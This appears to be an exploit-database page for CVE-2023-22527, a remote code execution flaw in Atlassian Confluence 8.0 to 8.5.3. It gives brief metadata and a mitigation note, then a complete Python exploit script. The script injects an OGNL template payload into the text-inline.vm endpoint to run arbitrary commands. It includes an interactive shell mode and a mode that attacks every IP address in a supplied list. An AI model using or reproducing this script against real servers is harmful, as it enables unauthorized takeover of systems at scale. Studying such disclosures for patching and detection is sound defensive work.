header-logo
Suggest Exploit
vendor:
Confluence
by:
MaanVader
8.1
CVSS
CRITICAL
Remote Code Execution (RCE)
94
CWE
Product Name: Confluence
Affected Version From: 8.0.x
Affected Version To: 8.5.2003
Patch Exists: YES
Related CWE: CVE-2023-22527
CPE: a:atlassian:confluence
Other Scripts:
Platforms Tested: Linux
2024

CVE-2023-22527: Atlassian Confluence RCE Vulnerability

The vulnerability allows remote attackers to execute arbitrary code on the affected Atlassian Confluence servers. By sending a specially crafted payload to the '/template/aui/text-inline.vm' endpoint, an attacker can exploit this issue. This vulnerability is identified as CVE-2023-22527.

Mitigation:

To mitigate this vulnerability, it is recommended to update Atlassian Confluence to a patched version provided by the vendor.
Source

Exploit-DB raw data:

# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability
# Date: 25/1/2024
# Exploit Author: MaanVader
# Vendor Homepage: https://www.atlassian.com/software/confluence
# Software Link: https://www.atlassian.com/software/confluence
# Version:  8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3
# Tested on: 8.5.3
# CVE : CVE-2023-22527



import requests
import argparse
import urllib3
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from rich.console import Console

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Argument parsing
parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")
parser.add_argument("-u", "--url", help="Single Confluence Server URL")
parser.add_argument("-f", "--file", help="File containing list of IP addresses")
parser.add_argument("-c", "--command", help="Command to Execute")
parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")
args = parser.parse_args()

# Rich console for formatted output
console = Console()

# Function to send payload
def send_payload(url, command):
    headers = {
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'
                      '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')
    headers['Content-Length'] = str(len(payload))
    
    full_url = f"{url}/template/aui/text-inline.vm"
    response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)
    return response.text.split('<!DOCTYPE html>')[0].strip()

# Interactive shell function
def interactive_shell(url):
    session = PromptSession()
    console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")
    while True:
        try:
            cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))
            if cmd.lower() in ["exit", "quit"]:
                break
            response = send_payload(url, cmd)
            console.print(response)
        except KeyboardInterrupt:
            break
        except Exception as e:
            console.print(f"[bold red]Error: {e}[/bold red]")
            break

# Process file function
def process_file(file_path):
    with open(file_path, 'r') as file:
        for line in file:
            ip = line.strip()
            url = f"http://{ip}:8090"
            console.print(f"Processing {url}")
            print(send_payload(url, args.command))

# Main execution logic
if args.shell and args.url:
    interactive_shell(args.url)
elif args.url and args.command:
    print(send_payload(args.url, args.command))
elif args.file and args.command:
    process_file(args.file)
else:
    print("Error: Please provide a valid URL and a command or use the interactive shell option.")